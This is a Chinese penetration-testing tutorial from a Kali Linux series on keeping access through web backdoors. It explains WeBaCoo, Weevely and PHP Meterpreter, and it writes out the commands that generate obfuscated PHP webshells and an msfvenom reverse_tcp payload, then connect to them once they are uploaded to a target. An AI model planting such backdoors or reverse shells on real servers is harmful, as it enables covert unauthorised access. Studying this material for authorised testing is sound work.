Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门
WeBaCoo
WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具。借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端。
WeBaCoo有两种工作模式:
- Generation(生产线模式):指定-g选项可进入这种模式。用户可以在这种模式下制作PHP代码的payload
- Terminal(终端模式):指定-t选项可进入这种模式,用户可以在这种模式下连接到被测主机的后门程序。
WeBaCoo的精妙之处在于,Web服务器和客户端之间的通信载体是Cookie。这就意味着多数的杀毒软件、网络入侵检测/防御系统、网络防火墙和应用程序防火墙都无法检测到后门的所在。
WeBaCoo的HTTP Cookie中以下三个参数最为重要:
- cm:以base64编码的shell指令
- cn:加载着编码后输出内容的Cookie名称
- cp:封装编码后输出内容的分隔符
如需启动WeBaCoo程序,可以在终端输入下述命令:
与生成模式有关的命令行选项如下:
选项 | 描述 |
-g | 制作后门代码 |
-f |
后门所需要的PHP功能 system(default) shell_exec exec passthru popen |
-o | 指定生成的后门程序的文件名 |
如果要使用默认的设置,生成名为test.php的PHP后门程序,并使用WeBaCoo的代码混淆技术对后门进行处理,那么可以使用下述命令
webacoo -g -o test.php
文件test.php内容如下:
而后,包这个文件上传到被测主机上去
接下来就可以使用下面的命令连接到被测主机的后门程序了:
webacoo -t -u http://ip/test.php
WeBaCoo后门的客户端和服务器端的通信是不易发现的、
Weevely
Weevely是一款具有高隐蔽性的针对PHP平台的WEBShell。它实现了SSH风格的终端界面,并有大量自动化的模块。测试人员可用它来执行系统命令、远程管理和渗透后期的自动渗透界面。
Weevely的主要用途是:
- 生成混淆的PHP backdoor
- 在图像文件中追加多态后门程序,并可以通过。htaccess文件赋予图像文件执行权限。
- 生成后门。htaccess文件。
- 可通过help选项列出程序的全部模块和生成工具
使用夏磊指令可以生成混淆PHP backdoor,并将后门保存为display.php
weevely generate password display.php
之后还是以一样,上传到目标机器上
之后链接WEBshell即可
PHP Meterpreter
Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP webShell。利用目标的漏洞(诸如常见的注入、文件上传漏洞)之后,再把它的shell传到目标主机即可。
Metasploit 的msfvenom工具可以制作PHP Meterpreter,具体指令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x -f raw >php-meter.php
上述指令各选项的作用如下:
-p :指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式(raw)
LHOST :设定目标主机的IP地址
Metasploit会把生成的PHP Meterpreter保存为文件php-mter.php。
Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门相关推荐
- Kali linux渗透测试系列————24、Kali linux 渗透攻击之客户端攻击
客户端攻击 客户端(client)或主机(host)是指用来上网的终端设备,比如计算机.平板电脑或是移动设备.客户端可能会为其他客户端提供信息.服务及应用,或是从其他系统(比如服务器)获取信息.通常, ...
- Kali linux渗透测试系列————23、Kali linux 渗透攻击之服务器端攻击
漏洞评估 服务器端攻击即找出并利用服务器上的服务.端口和应用程序中的漏洞.举个例子,Web服务器都有多个攻击途径(Attack Vector).它会运行一个操作系统,并运行各种各样的软件来提供Web功 ...
- Kali linux渗透测试系列————29、Kali linux 渗透攻击之无线网络攻击
由于本人没有无线网卡,所以这部分暂时无法提供!之后又空的时候回出一个系列到时候给大家进行详细的介绍.
- Kali Linux渗透测试 142 Mestasploit 基本使用
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- Kali Linux渗透测试 128 拒绝服务--TearDrop 攻击
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- Kali Linux渗透测试 093 自动注入-Sqlmap
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- Kali Linux渗透测试 126 拒绝服务--Smurf 攻击
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- 【Kali Linux 渗透测试】学习笔记
Kali Linux 渗透测试 文章目录 Kali Linux 渗透测试 介绍 一. 渗透测试标准 二. 安装 三. 定制 网络配置 更新升级 安裝软件包 并发线程限制 电源优化 快捷键 四. 试验环 ...
- Kali Linux渗透测试 106 离线密码破解
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
最新文章
- 业界丨2018深度学习十大趋势:元学习成新SGD,多数硬件创企将失败
- ios 打开评论界面
- cytoscape插件下载_Cytoscape下载
- jaxb解析字符串xml_一个JAXB Nuance:字符串与枚举(受限制的XSD字符串)的枚举
- 女人不需要哲学,因为哲学不能给她们带来面包
- Java判断拼音的工具类
- NDK学习笔记:一起来变萝莉音!FMOD学习总结(上)
- 计算机四级少选给分吗,计算机四级:考高分的有效途径(转载)
- 【Vue.js安装】
- Android Studio 3.5.2版本安装流程
- linux下查大文件的方法
- javaScript数组操作--有道笔记整理
- ProVideoPlayer 3 for Mac(多屏幕媒体播放器)
- DroneKit(四)——无人机协同
- protoc编译错误
- 系统(架构)设计五要素
- 初值定理与终值定理的推导(S域和Z域)
- 前端基础(二):CSS
- activiti——网关
- osgEarth 编译
热门文章
- python3 23.keras使用交叉熵代价函数进行MNIST数据集简单分类 学习笔记
- 每天一个新知识之Linux的LVM逻辑卷管理
- word柱状图柱子紧密_诉讼状word(word文档柱状图如何编辑数据)
- $U_{GSQ}$对共源放大电路电压放大倍数的影响
- 北漂程序员一天的生活
- 统计建模与R软件-第三章习题答案
- Mysql查询条件为大于时,不走索引失效问题排查
- VOCBENCH声码器评价基准
- plc s7-200的a/d转换的c语言程序,200PLC 模拟量输入 A/D转换后的数字量不准-工业支持中心-西门子中国...
- mysql数据库存储生僻字_mysql 生僻字存储